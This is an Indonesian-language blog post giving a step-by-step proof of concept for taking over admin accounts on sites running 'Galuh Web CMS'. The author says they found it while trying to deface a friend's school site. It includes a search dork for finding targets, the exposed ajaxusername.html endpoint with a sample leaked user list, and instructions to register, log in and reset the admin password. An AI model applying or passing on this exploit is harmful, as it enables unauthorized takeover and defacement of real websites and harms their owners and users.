untung mood lagi enak untuk ngeblog iseng iseng gua share POC Bypass Ajasxusername :D caranya ini gua dapet waktu gua iseng iseng mau deface site sekolah teman gua,
Udah segalah hal udah gua gunain sampe Reverse ip udah gua pake dan tetap gak kena tuh sekolah, yah mau gak mau gua terpaksa dehh gua masukin satu per satu foldernya :v entah sengaja atau gak, gua masuk ke ajaxusername dan ini caranya.
ikutin Step by step :D
Pertama-tama masukan dork nya di mesin pencarianmu mozila,google chrome,internet explore dsb.
Dork : Powered By: Galuh Web CMS
Exploit/ajaxusername.html
bila sudah dapet target langsung aja masukin exploitnya di belakang url
www.target/ajaxusername.html
bila diexploit muncul bacaan
{"page":1,"total":"6","rows":[{"id":"37","cell":["diadia123","diahanyadia","Kontibutor","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"36","cell":["mandoza","mandoza","User","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"35","cell":["loscardos1","loscardos1","User","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"33","cell":["D4US23"","User","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"26","cell":["kontributor","kontributor","Kontibutor","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"1","cell":["admin","Admin","Admin","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]}]}
berarti itu vuln :v
itu daftar nama nama user dan admin :v
kemudin langsung aja register di
www.target/username.html
bila sudah daftar langsung aja login
www.target/login.html
gak meski di login.html kadang ada yang di masuk.html
dan bila sudah login kemudian masukin lagi explotitnya
www.target/ajaxusername.html
dan klik Gambar kunci/ tulisan change passwor (admin )
bila password admin sudah keganti kemudian logout lagi dan, login menggunakan
Username: admin dan password yang sudah di ganti tadi :V
Binggung ya kenapa harus daftar dulu ? Karena jika kita mau ganti password admin langsung, pasti kita di alihkan ke login.html
No comments:
Write comments